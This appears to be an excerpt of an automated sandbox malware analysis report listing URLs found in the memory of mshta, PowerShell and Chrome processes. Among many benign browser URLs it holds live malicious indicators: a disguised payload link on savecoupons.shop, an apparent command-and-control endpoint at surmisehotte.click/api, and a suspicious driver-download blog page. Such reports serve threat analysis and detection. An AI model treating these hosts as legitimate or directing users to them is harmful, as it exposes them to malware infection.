Source: mshta.exe, 00000002.00000002.56251199450.0000000006C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4...I
Source: mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4C:
Source: powershell.exe, 00000003.00000002.56226820699.00000000081DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56228034804.0000000008311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4LMEM
Source: mshta.exe, 00000002.00000003.56235294341.000000000B079000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4LMEMH
Source: mshta.exe, 00000002.00000002.56249149191.00000000030F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4O#
Source: powershell.exe, 00000003.00000002.56226345857.0000000008182000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4STEMWdtPWdtPWdtP
Source: mshta.exe, 00000002.00000003.56233772606.000000000317A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4TTC:
Source: mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56248897252.0000000003060000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4WinSta0
Source: mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4Y
Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4ZA
Source: mshta.exe, 00000002.00000003.56243252442.0000000006E95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243177692.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243292644.0000000006E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl6.mp4
Source: mshta.exe, 00000002.00000003.56241454903.0000000006E85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl6.mp4$
Source: mshta.exe, 00000002.00000003.56243252442.0000000006E95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243177692.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243292644.0000000006E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4l
Source: mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4p
Source: powershell.exe, 00000003.00000002.56227747151.00000000082B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4pm1
Source: powershell.exe, 00000003.00000002.56226345857.0000000008192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4t%
Source: powershell.exe, 00000003.00000002.56226345857.0000000008192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4tory
Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4ventindowsINetCookiesL
Source: chrome.exe, 00000009.00000002.57285582693.0000781C022A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285933561.0000781C02310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000009.00000002.57285487694.0000781C02288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293972178.0000781C03080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299904492.0000781C037C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.newegg.com/shop/cart
Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
Source: chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.of
Source: chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.ofce
Source: chrome.exe, 00000009.00000002.57291415985.0000781C02C84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.cm/?
Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com
Source: chrome.exe, 00000009.00000002.57289152036.0000781C02990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286804233.0000781C02448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295897762.0000781C03344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294691129.0000781C031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0330C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295311582.0000781C0326C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/signin-oidc
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comp_
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shop.lululemon.com/shop/mybag
Source: chrome.exe, 00000009.00000002.57299754105.0000781C037A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/cart/
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.usps.com/store/cart/cart.jsp
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: chrome.exe, 00000009.00000002.57282750707.000078180006C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surmisehotte.click/
Source: powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surmisehotte.click//
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surmisehotte.click/H
Source: powershell.exe, 00000008.00000002.57436196787.0000000004C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surmisehotte.click/api
Source: powershell.exe, 00000008.00000002.57431193652.0000000000670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surmisehotte.click/apier
Source: powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surmisehotte.click/hur
Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.snapchat.com/cm/i
Source: chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/
Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
Source: chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.htmll
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.academy.com/shop/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.acehardware.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.adorama.com/als.mvc/cartview
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ae.com/us/en/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.altardstate.com/cart/
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/gp/cart/view.html
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anthropologie.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.apple.com/shop/bag
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.atlassian.com/purchase/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.att.com/buy/cart
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/
Source: chrome.exe, 00000009.00000002.57301057032.0000781C03A42000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226362545.0000781C037E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: chrome.exe, 00000009.00000002.57301057032.0000781C03A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeime
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/v
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bathandbodyworks.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bedbathandbeyond.com/store/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.belk.com/shopping-bag/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.do
Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=58216995782927489&postID=5453638059923624242&blogspo
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bloomingdales.com/my-bag
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.boostmobile.com/cart.html
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bricklink.com/v2/globalcart.page
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.buybuybaby.com/store/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.carid.com/cart.php
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.chegg.com/shoppingcart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.containerstore.com/cart/list.htm
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
Source: chrome.exe, 00000009.00000002.57288458289.0000781C027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dsw.com/en/us/shopping-bag
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000009.00000002.57293972178.0000781C03080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org
Source: chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/
Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297723078.0000781C03518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/&Download
Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.electronicexpress.com/cart
